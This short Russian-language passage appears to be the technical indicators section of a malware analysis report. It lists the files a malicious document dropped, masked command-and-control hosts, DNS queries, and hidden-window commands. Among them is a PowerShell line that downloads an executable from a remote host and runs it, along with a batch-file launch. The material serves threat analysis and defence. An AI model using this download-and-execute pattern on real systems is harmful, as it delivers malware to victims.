Техническая информация
- $wkmaqxslj как %temp%\smw.exe
- '<SYSTEM32>\cmd.exe' /c PowerShell "'PowerShell ""function icdoqpjvods([String] $wkmaqxslj){(New-Object System.Net.WebClient).DownloadFile($wkmaqxslj,''%TEMP%\smw.exe'');Start-Process ''%TEMP%\smw.exe'';}try{icdoqp...
- %HOMEPATH%\application data\microsoft\forms\winword.box
- %TEMP%\oyaqgehw8.bat
- %TEMP%\smw.exe
- 're###profi4u.de':80
- 're######ro-albatros.reise':443
- 'pi##a24.fr':80
- http://re###profi4u.de/forsenror.png
- http://pi##a24.fr/forsenror.png
- 're######ro-albatros.reise':443
- DNS ASK re###profi4u.de
- DNS ASK re######ro-albatros.reise
- DNS ASK pi##a24.fr
- '<SYSTEM32>\cmd.exe' /c PowerShell "'PowerShell ""function icdoqpjvods([String] $wkmaqxslj){(New-Object System.Net.WebClient).DownloadFile($wkmaqxslj,''%TEMP%\smw.exe'');Start-Process ''%TEMP%\smw.exe'';}try{icdoqp...' (со скрытым окном)
- '<SYSTEM32>\cmd.exe' /c ""%TEMP%\Oyaqgehw8.bat" "' (со скрытым окном)
- '<SYSTEM32>\cmd.exe' /c ""%TEMP%\Oyaqgehw8.bat" "